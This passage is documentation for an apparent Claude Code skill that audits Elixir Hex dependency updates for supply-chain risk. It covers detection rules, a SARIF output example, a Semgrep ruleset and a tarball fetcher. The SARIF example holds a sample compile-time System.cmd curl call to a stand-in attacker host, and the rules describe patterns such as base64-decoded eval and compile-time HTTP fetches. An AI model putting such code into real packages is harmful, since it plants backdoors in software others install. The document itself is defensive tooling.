            scan.(ast, true, scan)
          " -- \"${file}\" 2>/dev/null \
          | while IFS='|' read -r line snippet message; do
              emit \"${pkg}\" \"${ver}\" 3 \"block\" \
                \"${file#${dir}/}\" \"${line}\" \"${snippet}\" \"${message}\"
            done
        done
      }
      ```
      
      **FP rate:** ~3%. Some legit build-tool packages (`make`-style wrappers)
      shell out at compile time. Manual review needed when flagged.
      
      ---
      
      ## Rule 4 — `:erlang.binary_to_term/1` on literal without `:safe` (BLOCK)
      
      Unsafe deserialization (CVE-2026-21619 in hex_core itself). Detect calls to
      `:erlang.binary_to_term/1` without `[:safe]` in the second arg.
      
      ```bash
      rule_4_binary_to_term() {
        local pkg="$1" ver="$2" dir="$3"
      
        find "${dir}" -name '*.ex' -o -name '*.exs' | while read -r file; do
          mix run --no-deps-check --no-compile -e "
            path = System.argv() |> List.first()
            {:ok, ast} = path |> File.read!() |> Code.string_to_quoted(file: path, columns: true)
      
            scan = fn ast, scan ->
              case ast do
                # arity-1: no opts at all
                {{:., _, [:erlang, :binary_to_term]}, m, [_]} ->
                  IO.puts(\"#{m[:line]}|:erlang.binary_to_term/1|missing :safe option\")
      
                # arity-2: opts present but :safe not in list
                {{:., _, [:erlang, :binary_to_term]}, m, [_, opts]} when is_list(opts) ->
                  unless :safe in opts do
                    IO.puts(\"#{m[:line]}|:erlang.binary_to_term/2|:safe not in opts\")
                  end
      
                {_, _, children} when is_list(children) -> Enum.each(children, &scan.(&1, scan))
                list when is_list(list) -> Enum.each(list, &scan.(&1, scan))
                _ -> :ok
              end
            end
            scan.(ast, scan)
          " -- \"${file}\" 2>/dev/null \
          | while IFS='|' read -r line snippet message; do
              emit \"${pkg}\" \"${ver}\" 4 \"block\" \
                \"${file#${dir}/}\" \"${line}\" \"${snippet}\" \"${message}\"
            done
        done
      }
      ```
      
      **FP rate:** ~2%. Internal serialization formats sometimes pass trusted
      binaries — but those should still use `:safe`. The fix is one keyword.
      
      ---
      
      ## Rule 5 — New `:git` / `:path` dep in `mix.exs` (BLOCK)
      
      Diff `deps/0` between OLD and NEW versions. Flag any new entry that uses
      `:git:` or `:path:` (not `:hex` — hex is the trusted default).
      
      ```bash
      rule_5_new_git_path() {
        local pkg="$1" ver="$2" new_dir="$3" old_dir="$4"
      
        [ -z "${old_dir}" ] && return 0   # no old version → skip diff rule
      
        extract_deps() {
          mix run --no-deps-check --no-compile -e "
            path = System.argv() |> List.first()
            {:ok, ast} = File.read!(path) |> Code.string_to_quoted()
      
            # locate deps/0 in module body
            deps = Macro.prewalk(ast, [], fn
              {:def, _, [{:deps, _, _} | _]} = node, acc -> {node, [node | acc]}
              other, acc -> {other, acc}
            end) |> elem(1) |> List.first()
      
            case deps do
              nil -> :ok
              {:def, _, [_head, [do: {:__block__, _, _} | _]]} -> :ok  # unusual
              {:def, _, [_head, [do: list]]} when is_list(list) ->
                for entry <- list do
                  case entry do
                    {dep, _, opts} when is_atom(dep) and is_list(opts) ->
                      cond do
                        Keyword.has_key?(opts, :git) -> IO.puts(\"#{dep}|git|#{inspect(opts[:git])}\")
                        Keyword.has_key?(opts, :path) -> IO.puts(\"#{dep}|path|#{inspect(opts[:path])}\")
                        true -> :ok
                      end
                    _ -> :ok
                  end
                end
              _ -> :ok
            end
          " -- "${1}" 2>/dev/null
        }
      
        local old_deps new_deps
        old_deps=$(extract_deps "${old_dir}/mix.exs" 2>/dev/null || true)
        new_deps=$(extract_deps "${new_dir}/mix.exs" 2>/dev/null || true)
      
        # New entries = in new_deps but not in old_deps
        comm -13 <(echo "${old_deps}" | sort -u) <(echo "${new_deps}" | sort -u) \
        | while IFS='|' read -r dep kind src; do
            [ -z "${dep}" ] && continue
            emit "${pkg}" "${ver}" 5 "block" \
              "mix.exs" "" "{:${dep}, ${kind}: ${src}}" \
              "New ${kind} dep added vs old version — bypasses Hex's checksumming"
          done
      }
      ```
      
      **FP rate:** ~5%. Some libraries legit use `:git` for transitive forks
      (e.g., a pinned `phoenix_html` fork). Manual review acceptable.
      
      ---
      
      ## Rule 6 — Maintainer change between versions (BLOCK)
      
      Implemented in `references/hex-api.md` as `maintainer_change()`. Reproduced
      here for completeness:
      
      ```bash
      rule_6_maintainer_change() {
        local pkg="$1" old_ver="$2" new_ver="$3" ver="$4"
      
        [ -z "${old_ver}" ] && return 0
      
        local out
        out=$(maintainer_change "${pkg}" "${old_ver}" "${new_ver}")
        if [ -n "${out}" ]; then
          local message=$(echo "${out}" | cut -d'|' -f3)
          emit "${pkg}" "${ver}" 6 "block" \
            "" "" "${message}" "${message}"
        fi
      }
      ```
      
      Depends on Hex API `/api/packages/:name/releases/:version` returning a
      `publisher.username` field. **FP rate:** ~2%.
      
      ---
      
      ## Rule 7 — Base64 blob > 256 chars outside allowlisted dirs (WARN)
      
      Regex for long base64-ish strings, excluding `priv/static/`,
      `test/fixtures/`, `assets/`, `node_modules/` (if vendored).
      
      ```bash
      rule_7_base64() {
        local pkg="$1" ver="$2" dir="$3"
      
        # macOS BSD grep caps repetition count at 255; use perl for the >=256 match.
        find "${dir}" \( -name '*.ex' -o -name '*.exs' \) \
          -not -path '*/priv/*' -not -path '*/test/*' \
          -not -path '*/assets/*' -not -path '*/node_modules/*' -print0 \
        | xargs -0 perl -ne '
            if (/"[A-Za-z0-9+\/]{256,}={0,2}"/) {
              chomp; my $s = substr($_, 0, 200);
              printf("%s\x1f%s\x1f%s\n", $ARGV, $., $s);
            }
          ' 2>/dev/null \
        | while IFS=$'\x1f' read -r file line snippet; do
            emit "${pkg}" "${ver}" 7 "warn" \
              "${file#${dir}/}" "${line}" "${snippet}" \
              "Base64-like string literal >256 chars outside priv/static, test/fixtures, assets/"
          done
      }
      ```
      
      **Portability note:** Rules 1 and 7 use perl instead of `grep -P` /
      `grep -E '{256,}'` because (a) macOS BSD grep lacks `-P`, and (b) BSD grep
      caps `{n,}` at 255. Linux GNU grep handles both natively, but perl works
      identically on both — net win.
      
      **FP rate:** ~8%. License headers, embedded SVG/PNG, fixture data. Bump
      threshold to 512 if too noisy in real use. The directory exclude list
      catches the most common legit cases.
      
      ---
      
      ## Rule 8 — Typosquat (Levenshtein ≤ 2 + 1000× download delta) (BLOCK)
      
      Implemented in `references/hex-api.md` as `typosquat_check()`. Reproduced:
      
      ```bash
      rule_8_typosquat() {
        local pkg="$1" ver="$2"
      
        typosquat_check "${pkg}" \
        | while IFS='|' read -r sev rule message; do
            [ -z "${sev}" ] && continue
            emit "${pkg}" "${ver}" 8 "block" \
              "" "" "${message}" "${message}"
          done
      }
      ```
      
      Depends on the top-500 cache (fetched daily) and per-package download
      counts. **FP rate:** ~1%.
      
      ---
      
      ## Master runner
      
      ```bash
      run_all_rules() {
        # Phase 2 differential mode: emit NEW findings to findings.jsonl AND
        # OLD findings to findings.old.jsonl in the same loop. When DIFFERENTIAL=0,
        # behave like Phase 1 (no OLD pass).
        : > ${AUDIT_TMPDIR}/findings.jsonl
        : > ${AUDIT_TMPDIR}/findings.old.jsonl
      
        local differential="${DIFFERENTIAL:-1}"
      
        jq -c '.changed[], .added[]' ${AUDIT_TMPDIR}/diff.json \
        | while IFS= read -r row; do
            pkg=$(echo "${row}" | jq -r '.[0]')
            old=$(echo "${row}" | jq -r '.[1]')
            new=$(echo "${row}" | jq -r '.[2]')
            [ "${new}" = "null" ] && continue
      
            new_dir="${AUDIT_TMPDIR}/tarballs/${pkg}/${new}"
            old_dir=""
            [ "${old}" != "null" ] && old_dir="${AUDIT_TMPDIR}/tarballs/${pkg}/${old}"
      
            # --- NEW pass: emit to findings.jsonl ---
            FINDINGS_FILE="${FINDINGS_FILE:-${AUDIT_TMPDIR}/findings.jsonl}" \
              rule_1_bidi              "${pkg}" "${new}" "${new_dir}" &
            FINDINGS_FILE="${FINDINGS_FILE:-${AUDIT_TMPDIR}/findings.jsonl}" \
              rule_2_eval              "${pkg}" "${new}" "${new_dir}" &
            FINDINGS_FILE="${FINDINGS_FILE:-${AUDIT_TMPDIR}/findings.jsonl}" \
              rule_3_compile_exec      "${pkg}" "${new}" "${new_dir}" &
            FINDINGS_FILE="${FINDINGS_FILE:-${AUDIT_TMPDIR}/findings.jsonl}" \
              rule_4_binary_to_term    "${pkg}" "${new}" "${new_dir}" &
            FINDINGS_FILE="${FINDINGS_FILE:-${AUDIT_TMPDIR}/findings.jsonl}" \
              rule_7_base64            "${pkg}" "${new}" "${new_dir}" &
            wait
      
            # --- OLD pass (differential mode): emit to findings.old.jsonl ---
            if [ "${differential}" = "1" ] && [ -n "${old_dir}" ] && [ -d "${old_dir}" ]; then
              FINDINGS_FILE=${AUDIT_TMPDIR}/findings.old.jsonl \
                rule_1_bidi              "${pkg}" "${old}" "${old_dir}" &
              FINDINGS_FILE=${AUDIT_TMPDIR}/findings.old.jsonl \
                rule_2_eval              "${pkg}" "${old}" "${old_dir}" &
              FINDINGS_FILE=${AUDIT_TMPDIR}/findings.old.jsonl \
                rule_3_compile_exec      "${pkg}" "${old}" "${old_dir}" &
              FINDINGS_FILE=${AUDIT_TMPDIR}/findings.old.jsonl \
                rule_4_binary_to_term    "${pkg}" "${old}" "${old_dir}" &
              FINDINGS_FILE=${AUDIT_TMPDIR}/findings.old.jsonl \
                rule_7_base64            "${pkg}" "${old}" "${old_dir}" &
              wait
            fi
      
            # Diff rules (intrinsically diff-aware — single pass).
            rule_5_new_git_path      "${pkg}" "${new}" "${new_dir}" "${old_dir}"
      
            # Hex API rules — package-scoped, not differential.
            rule_6_maintainer_change "${pkg}" "${old}" "${new}" "${new}"
            rule_8_typosquat         "${pkg}" "${new}"
          done
      
        # Set-subtract NEW vs OLD into new_signals / info_signals / dropped_signals.
        if [ "${differential}" = "1" ]; then
          python3 "${CLAUDE_SKILL_DIR}/scripts/diff_findings.py" \
            --new  ${AUDIT_TMPDIR}/findings.jsonl \
            --old  ${AUDIT_TMPDIR}/findings.old.jsonl \
            --new-out     ${AUDIT_TMPDIR}/new_signals.jsonl \
            --info-out    ${AUDIT_TMPDIR}/info_signals.jsonl \
            --dropped-out ${AUDIT_TMPDIR}/dropped_signals.jsonl
        fi
      }
      ```
      
      `FINDINGS_FILE` defaults to `findings.jsonl` for backward compat. The
      `emit()` helper at the top of this file must be updated to redirect to
      `${FINDINGS_FILE}` instead of the hard-coded path — that's a one-line
      change inside `emit()`.
      
      ## Anti-FP notes
      
      - **Rule 7 (base64)** is the dominant noise source. Always include `priv/`
        in the exclude list. Bumping threshold to 512 chars drops most legit
        embedded SVG.
      - **Rules 2 + 3** rely on `Code.string_to_quoted/2` — files with syntax
        errors silently skip. This is acceptable (the package wouldn't compile
        anyway). Log skipped files in `--verbose` mode for debugging.
      - **Rule 5** trips on `:path` deps used for monorepo umbrella apps. The
        intent of the rule is "dep added that bypasses Hex" — manual approval
        is reasonable when the user knows the path dep.
      
      ## Phase 2 additions
      
      - **Differential mode** — `DIFFERENTIAL=1` (default) emits findings on
        OLD as well as NEW, then NDJSON set-subtracts via
        `scripts/diff_findings.py`. See `differential.md`.
      - **Optional precision layers** — `semgrep --config priv/semgrep/` and
        `yara -r priv/yara/` run alongside native rules when available; both
        are soft deps. See `semgrep.md` and `yara.md`.
      - **LLM triage** — high-score packages get verdicts via the
        `hex-deps-triager` sonnet agent with a `context-supervisor`
        consolidating per-package output. See `llm-triage.md`.
      
      ## Out of scope (Phase 3+)
      
      - Sourceror dependency for richer AST patterns (currently using built-in
        `Code.string_to_quoted/2`).
      - Sobelow on unpacked tarballs (would cover Rules 2–4 with stronger taint
        analysis).
      - Multi-agent orchestrator (5 specialist auditors) — Phase 2 native +
        Semgrep + YARA cover MVP.
      - PreToolUse hook on `mix deps.get` — needs Phase 2 ledger to be solid.
      
    • sarif.md 6.1 KB
      # SARIF output — `--sarif <path>`
      
      Phase 2 adds SARIF 2.1.0 emission so audit findings can flow into the
      same UIs developers already use for SAST: VS Code's `sarif-viewer`,
      GitHub's Code Scanning alerts, and JetBrains' Qodana surfaces.
      
      ## Iron Laws
      
      1. **SARIF is additive, NOT replacement.** Markdown table on stdout
         stays the default. `--sarif <path>` writes SARIF alongside; it
         does not silence the other outputs.
      2. **No hard tabs in any emitted YAML/JSON example.** SARIF JSON
         uses 2-space indent. Examples in this doc and docs/ use 2-space
         indent too — never tabs (markdown lint MD010).
      3. **Schema-validate every run.** Smoke must include a SARIF
         round-trip: `--sarif /tmp/out.sarif` → validate against
         schemastore SARIF 2.1.0 schema → re-load. Catches mapping bugs
         that ad-hoc users won't catch.
      4. **Stable `ruleId`.** Use `phx-deps-audit/rule-<N>` (e.g.
         `phx-deps-audit/rule-3`). Don't change the prefix across versions
         — GitHub Code Scanning de-duplicates by `ruleId` over PR history.
      
      ## SARIF 2.1.0 contract
      
      A SARIF log is a JSON document with one or more `runs`. We emit a
      single run per audit:
      
      ```json
      {
        "$schema": "https://json.schemastore.org/sarif-2.1.0.json",
        "version": "2.1.0",
        "runs": [
          {
            "tool": {
              "driver": {
                "name": "phx-deps-audit",
                "version": "2.10.0",
                "informationUri": "https://github.com/oliver-kriska/claude-elixir-phoenix",
                "rules": [
                  {
                    "id": "phx-deps-audit/rule-1",
                    "name": "BidiUnicodeControlChar",
                    "shortDescription": {"text": "Bidi Unicode control char in source"},
                    "fullDescription": {"text": "Detects directional-override Unicode control characters in source files (Trojan Source CVE-2021-42574)."},
                    "helpUri": "https://github.com/oliver-kriska/claude-elixir-phoenix/blob/main/plugins/elixir-phoenix/skills/deps-audit/references/heuristics.md#rule-1",
                    "defaultConfiguration": {"level": "error"}
                  }
                ]
              }
            },
            "results": [
              {
                "ruleId": "phx-deps-audit/rule-3",
                "level": "error",
                "message": {
                  "text": "System.cmd at compile time in lib/init.ex:14 — package phoenix_extras 0.2.0"
                },
                "locations": [
                  {
                    "physicalLocation": {
                      "artifactLocation": {"uri": "lib/init.ex"},
                      "region": {"startLine": 14, "snippet": {"text": "System.cmd(\"curl\", [\"-fsSL\", \"https://attacker.example\"])"}}
                    },
                    "logicalLocations": [
                      {"name": "phoenix_extras", "kind": "package"},
                      {"name": "0.2.0", "kind": "version"}
                    ]
                  }
                ],
                "properties": {
                  "package": "phoenix_extras",
                  "version": "0.2.0",
                  "previous_version": "0.1.0",
                  "differential": "new"
                }
              }
            ]
          }
        ]
      }
      ```
      
      ### Severity mapping
      
      | Phase 1 severity | SARIF `level` | SARIF `kind` |
      |------------------|---------------|--------------|
      | block | error | fail |
      | warn | warning | fail |
      | info | note | informational |
      
      SARIF distinguishes `level` (severity) from `kind` (true/false
      positive). We emit `kind: "fail"` for block/warn and
      `kind: "informational"` for INFO — matching how Code Scanning UIs
      group results.
      
      ## Mapping logic
      
      ```python
      # scripts/findings_to_sarif.py — outline
      import json
      import sys
      from pathlib import Path
      
      LEVELS = {"block": "error", "warn": "warning", "info": "note"}
      
      def finding_to_result(f, package, version, previous_version):
          loc = {
              "physicalLocation": {
                  "artifactLocation": {"uri": f.get("file") or "mix.exs"},
                  "region": {"startLine": f.get("line") or 1}
              }
          }
          if f.get("snippet"):
              loc["physicalLocation"]["region"]["snippet"] = {"text": f["snippet"]}
          loc["logicalLocations"] = [
              {"name": package, "kind": "package"},
              {"name": version, "kind": "version"},
          ]
          return {
              "ruleId": f"phx-deps-audit/rule-{f['rule_id']}",
              "level": LEVELS.get(f.get("severity", "warn"), "warning"),
              "message": {"text": f.get("message", "")},
              "locations": [loc],
              "properties": {
                  "package": package,
                  "version": version,
                  "previous_version": previous_version,
                  "differential": f.get("differential", "new"),
              },
          }
      ```
      
      The skill body invokes this script over `new_signals.jsonl` (or
      `findings.jsonl` when `--no-differential`).
      
      ## Schema validation
      
      Smoke target (post-Phase 2):
      
      ```bash
      python3 -m jsonschema -i out.sarif \
        https://json.schemastore.org/sarif-2.1.0.json
      ```
      
      `pip install jsonschema` is a build-time dep, NOT a runtime dep —
      production audits don't validate (overhead). Validation runs in CI
      only.
      
      ## VS Code sarif-viewer
      
      ```text
      1. Install: `code --install-extension MS-SarifVSCode.sarif-viewer`
      2. Run audit: `/phx:deps-audit --sarif .claude/audit.sarif`
      3. In VS Code, open `.claude/audit.sarif` — the SARIF panel auto-opens
         and lets you jump to file:line for each result.
      ```
      
      ## GitHub upload-sarif action
      
      For projects that want CI gating, add a workflow step:
      
      ```yaml
      - name: Run deps-audit
        run: |
          claude code -m "/phx:deps-audit --sarif audit.sarif"
      - name: Upload SARIF to Code Scanning
        uses: github/codeql-action/upload-sarif@v3
        with:
          sarif_file: audit.sarif
          category: phx-deps-audit
      ```
      
      Note the 2-space indent (NOT tabs) — MD010 lint and the YAML parser
      both reject hard tabs. The `category` field separates phx-deps-audit
      results from other Code Scanning sources in the GitHub UI.
      
      ## Limitations
      
      - **No fix suggestions.** SARIF supports `fixes[]`, but deps-audit
        doesn't propose patches (it's a deps-level tool, not a code
        rewriter). Field omitted.
      - **No code flows.** Could compute `codeFlows[]` for Rule 3
        (`__before_compile__` → `System.cmd`) but adds parser complexity
        for little reviewer-side value. Deferred.
      - **Single tool.** Each audit emits one SARIF run with one driver.
        Multi-tool SARIF (Semgrep + YARA + native rules in one file)
        is a Phase 3 enhancement when those layers are stable.
      
    • semgrep.md 6.6 KB
      # Semgrep ruleset — optional precision layer
      
      Native rules (`rules-impl.md`) carry the high-severity detection load.
      Semgrep is an **optional precision layer** that stacks on top —
      findings from both sources merge into the same NDJSON stream and
      flow through the differ + renderer.
      
      ## Iron Laws
      
      1. **SOFT DEPENDENCY.** If `semgrep` is not installed, the audit
         skips the layer with a one-line install hint. Never auto-install,
         never block the audit run on its absence.
      2. **DEFENSE IN DEPTH, NOT REPLACEMENT.** Semgrep findings stack
         on native findings — they don't shadow them. A pattern caught by
         both layers shows up as two findings (with different `rule_id`
         namespaces), and the differ + ledger de-dup naturally.
      3. **NO `--diff-depth`.** Semgrep's `--diff-depth N` flag is for
         git-diff scanning. We run on full unpacked tarballs and diff
         findings ourselves via `diff_findings.py`. Don't conflate.
      4. **NORMALIZE TO PHASE 1 SHAPE.** Semgrep JSON output is parsed and
         coerced into the existing finding JSON shape — same field names,
         same severity vocabulary. The renderer doesn't know which layer a
         finding came from.
      
      ## Starter ruleset — `priv/semgrep/elixir-supply-chain.yaml`
      
      ```yaml
      # Phase 2 starter ruleset. Sevens rules covering the patterns most
      # robust to AST detection vs. ad-hoc regex. Soft dep — install
      # instructions in the README.
      rules:
        - id: elixir-compile-time-http
          message: HTTP fetch at compile time inside __before_compile__
          languages: [elixir]
          severity: ERROR
          pattern-either:
            - patterns:
                - pattern-inside: |
                    defmacro __before_compile__($ENV) do
                      ...
                    end
                - pattern: System.cmd("curl", $ARGS)
            - patterns:
                - pattern-inside: |
                    defmacro __before_compile__($ENV) do
                      ...
                    end
                - pattern: HTTPoison.get(...)
      
        - id: elixir-eval-string
          message: Code.eval_string with non-literal argument
          languages: [elixir]
          severity: ERROR
          pattern-either:
            - pattern: Code.eval_string($PAYLOAD)
            - pattern: Code.eval_quoted($PAYLOAD)
          pattern-not: Code.eval_string("$LITERAL")
          pattern-not: Code.eval_quoted("$LITERAL")
      
        - id: elixir-dynamic-system-cmd
          message: System.cmd with variable first argument
          languages: [elixir]
          severity: WARNING
          pattern: System.cmd($CMD, $ARGS)
          pattern-not: System.cmd("$LITERAL", $ARGS)
      
        - id: elixir-base64-to-eval
          message: Base.decode64 result fed directly to Code.eval_string
          languages: [elixir]
          severity: ERROR
          pattern-either:
            - pattern: Code.eval_string(Base.decode64!($X))
            - patterns:
                - pattern: |
                    $X = Base.decode64!(...)
                    ...
                    Code.eval_string($X)
      
        - id: elixir-on-load-with-side-effects
          message: __on_load__ callback running System.cmd / File.write
          languages: [elixir]
          severity: ERROR
          pattern-either:
            - patterns:
                - pattern-inside: |
                    def __on_load__() do
                      ...
                    end
                - pattern: System.cmd(...)
            - patterns:
                - pattern-inside: |
                    def __on_load__() do
                      ...
                    end
                - pattern: File.write(...)
      
        - id: elixir-binary-to-term-literal
          message: :erlang.binary_to_term called without :safe option
          languages: [elixir]
          severity: ERROR
          patterns:
            - pattern: :erlang.binary_to_term($X)
            - pattern-not: :erlang.binary_to_term($X, [:safe])
      
        - id: elixir-erlang-apply-dynamic
          message: :erlang.apply with non-literal module or function name
          languages: [elixir]
          severity: ERROR
          pattern: :erlang.apply($MOD, $FUN, $ARGS)
          pattern-not: :erlang.apply($MOD, :$LITERAL_ATOM, $ARGS)
      ```
      
      ## Subprocess invocation
      
      ```bash
      run_semgrep() {
        local tarball_dir="$1"
        command -v semgrep >/dev/null 2>&1 || {
          echo "semgrep: not installed (skipping). Install via 'brew install semgrep'." >&2
          return 0
        }
        semgrep \
          --config "${CLAUDE_SKILL_DIR}/priv/semgrep/elixir-supply-chain.yaml" \
          --lang elixir \
          --json \
          --quiet \
          --error \
          --metrics off \
          "${tarball_dir}" 2>/dev/null \
        | jq -c '.results[]?' \
        | while IFS= read -r r; do
            # Normalize Semgrep JSON to Phase 1 finding shape.
            jq -n -c \
              --arg pkg "${PKG}" --arg version "${VER}" \
              --arg rule_id "$(echo "${r}" | jq -r '.check_id')" \
              --arg severity "$(echo "${r}" | jq -r '.extra.severity | ascii_downcase')" \
              --arg file "$(echo "${r}" | jq -r '.path')" \
              --argjson line "$(echo "${r}" | jq -r '.start.line')" \
              --arg snippet "$(echo "${r}" | jq -r '.extra.lines | .[0:200]')" \
              --arg message "$(echo "${r}" | jq -r '.extra.message')" \
              '{pkg:$pkg, version:$version, rule_id:("semgrep/" + $rule_id),
                severity: (if $severity == "error" then "block" elif $severity == "warning" then "warn" else "info" end),
                file:$file, line:$line, snippet:$snippet, message:$message}' \
            >> "${FINDINGS_FILE:-${AUDIT_TMPDIR}/findings.jsonl}"
          done
      }
      ```
      
      Note the `rule_id` namespacing: native rules use integers 1-8;
      Semgrep rules use string prefixes (`semgrep/elixir-eval-string`).
      The differ's polymorphic key extraction handles string rule_ids
      via the `unknown` fallback path — a conservative high-entropy key
      keeps Semgrep findings stable across re-runs.
      
      ## Severity mapping
      
      | Semgrep severity | Phase 1 severity |
      |------------------|------------------|
      | ERROR | block |
      | WARNING | warn |
      | INFO | info |
      
      ## Performance
      
      Semgrep typically runs in ~5 seconds per package for the 7-rule
      starter set. On a 20-package audit run, that's 100s additional —
      considered acceptable for the precision boost. Parallelism via
      the `run_all_rules` master loop (rules are already backgrounded).
      
      ## When NOT to enable Semgrep
      
      - CI environments where install adds >2 minutes — pin a Docker image
        in CI rather than installing fresh each run.
      - Codebases with non-standard Elixir dialects (Phoenix LiveView
        HEEx templates inside `.ex` strings) — Semgrep's Elixir parser
        may stumble. Native rules don't care about embedded HEEx.
      
      ## Future ruleset growth
      
      The starter set covers the highest-precision wins. Additions in
      priority order:
      
      1. Module-attribute persistence of decoded payloads (cross-line
         data-flow).
      2. `:os.cmd` and `Port.open` in compile-time contexts.
      3. ETF (Erlang term format) literal patterns in source.
      4. `Cachex.put_or_create` with dynamic module names.
      
      Each new rule MUST land alongside a synthetic fixture in
      `lab/deps-audit/smoke-test/fixtures.d/` plus an entry in this file's table.
      
    • skill-checklist.md 3.9 KB
      # Skill Checklist — Phase 1 lessons baked in
      
      Pre-flight for any new skill or agent added to `claude-elixir-phoenix`.
      Captures the concrete gotchas that cost Phase 1 implementation ~15 minutes
      each. Apply this list **before** running `make eval`.
      
      ## Frontmatter
      
      - `name:` — kebab-case, namespaced when surfaced as a command
        (`phx:deps-audit`). Plain `deps-audit` works for internal skills.
      - `description:` — **≤200 characters** and **≥3 keywords** from the
        scorer's Elixir/Phoenix domain list (see `lab/eval/matchers.py:198`).
        Vague descriptions like "Audit deps" score zero on triggering.
        Effective pattern: `"<action> <domain> for <risk surface> —
        <specifics>. Use <when>."` Example:
        `"Audit Hex dep updates for supply-chain security risk — bidi chars,
        compile-time exec, maintainer changes. Use after mix deps.update."`
      - `argument-hint:` — quote the value if it contains `[...]`. Unquoted
        square brackets get parsed as YAML flow sequences.
        Wrong: `argument-hint: [--base <ref>] [--json]`
        Right: `argument-hint: "[--base <ref>] [--json]"`
      
      ## Headings
      
      - The Iron Laws heading must be literally `## Iron Laws` — no em-dash,
        no parenthetical. The eval scorer's `section_exists` check does a
        literal string match. Variants like `## Iron Laws — Never Violate`
        fail completeness.
      
      ## Body
      
      - Keep SKILL.md under ~150 lines. Command skills get ~185.
      - Reference paths use `${CLAUDE_SKILL_DIR}/references/<file>.md`. Bare
        `references/<file>.md` paths break in subagents because the cwd is
        the project, not the plugin install.
      - Iron Laws section: numbered list with concrete prohibitions and a
        one-sentence rationale per law. Aim for 4-6 laws.
      
      ## Markdown lint
      
      - Lists need a blank line above and below (MD032).
      - No hard tabs in code fences. Use 2-space indent. Even one tab in a
        Makefile snippet trips MD010 and fails CI.
      - Code fences must declare a language (` ```bash ` not just ` ``` `).
      
      ## Eval scorer
      
      - `make eval` runs `git diff` to find changed files. **Untracked files
        are invisible.** `git add` the new skill/agent before running, or
        `make eval-all` for the full pass.
      - Trigger-accuracy is cached per skill description hash. After tuning
        the description, the cache invalidates on its own.
      - Use `make eval-fix` to see exact failures and get auto-fix
        suggestions.
      - **Agents use a different scorer than skills.** `make eval` routes
        correctly. Manual scoring during development must pick the right one:
        - Skills → `python3 -m lab.eval.scorer <path>`
        - Agents → `python3 -m lab.eval.agent_scorer <path>`
        - Running `scorer.py` against an agent over-restricts (skill-shaped
          thresholds applied to agent content) and fails on dimensions the
          agent scorer skips. If a manual run reports completeness-0 on an
          obviously-complete agent, you used the wrong scorer.
      
      ## Agent-specific
      
      - No `permissionMode` on any agent. Claude Code ignores it on plugin
        agents, and the plugin directory's security scan fails
        `bypassPermissions`.
      - Read-only agents (no Write): set `disallowedTools: Edit,
        NotebookEdit` (NOT Write — agents need Write to save their own
        findings file). Set `omitClaudeMd: true`.
      - `effort:` must match model: `low` for haiku, `medium` for sonnet
        and opus. Mismatch fails the consistency check.
      
      ## Description keyword reference
      
      The fixed Elixir/Phoenix domain list is in `lab/eval/matchers.py`.
      Effective single-word triggers include: `audit`, `security`, `review`,
      `hex`, `mix`, `liveview`, `ecto`, `oban`, `phoenix`, `elixir`,
      `migration`, `changeset`, `genserver`, `supervisor`, `compile`, `test`,
      `debug`, `performance`. Aim for ≥3 of these in the description.
      
      ## Quick verification flow
      
      ```bash
      git add plugins/elixir-phoenix/skills/<new-skill>/
      make eval-fix          # see failures, get fix suggestions
      # Apply fixes, then:
      make eval              # confirm pass
      ```
      
      If only one skill or agent changed, `make eval` runs in <30 s. The
      full `make eval-all` over 51 skills + 26 agents takes ~5 min.
      
    • tarball-fetcher.md 7 KB
      # Tarball Fetcher — `mix hex.package fetch` (ephemeral, per-run)
      
      Fetches and unpacks Hex tarballs for both old and new versions of each
      changed package. All artifacts live in `${AUDIT_TMPDIR}/tarballs/` and
      are removed by the driver's EXIT trap (see `audit-tmpdir.md`).
      
      ## Tmpdir layout
      
      ```
      ${AUDIT_TMPDIR}/
      ├── lock.old              # diff-resolver: HEAD/base mix.lock
      ├── lock.new              # diff-resolver: working mix.lock
      ├── diff.json             # diff-resolver: {changed, added, removed}
      ├── hex-api/
      │   ├── packages/<pkg>.json
      │   └── top-500.json
      ├── tarballs/
      │   ├── phoenix/
      │   │   ├── 1.7.14/        # unpacked tarball — old
      │   │   └── 1.7.20/        # unpacked tarball — new
      │   └── <pkg>/<version>/
      ├── mix-audit.json
      └── cves_{old,new}.json
      ```
      
      `.claude/deps-audit/last-run.json` is the only **persistent** output —
      written at the end of rendering, just before the tmpdir is torn down.
      
      ## Single-version fetch
      
      ```bash
      fetch_version() {
        local pkg="$1" version="$2"
        : "${AUDIT_TMPDIR:?AUDIT_TMPDIR not set}"
        local dest="${AUDIT_TMPDIR}/tarballs/${pkg}/${version}"
      
        # Skip if already fetched this run (e.g., transitive dep listed twice
        # in the diff). The audit is ephemeral, so this is the only kind of
        # cache hit that exists.
        if [ -f "${dest}/hex_metadata.config" ]; then
          return 0
        fi
      
        mkdir -p "$(dirname "${dest}")"
        mix hex.package fetch "${pkg}" "${version}" --unpack -o "${dest}" 2>&1 \
          | grep -v "Fetching\|Unpacked\|^$" || true
      
        if [ ! -f "${dest}/hex_metadata.config" ]; then
          echo "ERROR: fetch failed for ${pkg} ${version}" >&2
          return 2
        fi
      }
      ```
      
      `mix hex.package fetch` exit code is 0 on success and 1 on network/checksum
      failure. Always verify `hex_metadata.config` exists before reporting success
      — `mix` is occasionally non-zero on success and zero on transient failure.
      
      ## Bulk fetch from `diff.json`
      
      Reads the resolver's output and fetches every `(pkg, old?, new?)` pair:
      
      ```bash
      fetch_from_diff() {
        jq -c '
          (.changed[] | [.[0], .[1], .[2]]),
          (.added[]   | [.[0], "_skip_old_", .[2]]),
          (.removed[] | [.[0], .[1], "_skip_new_"])
        ' "${AUDIT_TMPDIR}/diff.json" \
        | while IFS= read -r row; do
            pkg=$(echo "$row" | jq -r '.[0]')
            old=$(echo "$row" | jq -r '.[1]')
            new=$(echo "$row" | jq -r '.[2]')
      
            [ "$old" != "_skip_old_" ] && [ "$old" != "null" ] && fetch_version "$pkg" "$old"
            [ "$new" != "_skip_new_" ] && [ "$new" != "null" ] && fetch_version "$pkg" "$new"
          done
      }
      ```
      
      `added` packages have no old to fetch. `removed` packages have no new to
      fetch. Both forms produce a single tarball; rules that need both versions
      (Rule 5 dep diff, Rule 6 maintainer diff) skip these entries.
      
      ## Parallelism
      
      **4-way parallel fetch is the default.** Do **not** use
      `xargs … bash -c 'fetch_version …'` — that needs `export -f
      fetch_version`, which is bash-only (no-op under zsh) and does not
      survive across separate Bash tool calls anyway (see
      `audit-tmpdir.md` "Cross-tool-call handoff"). Materialize a
      self-contained script with the tmpdir path **baked in** (unquoted
      heredoc), then fan it out with `xargs`:
      
      ```bash
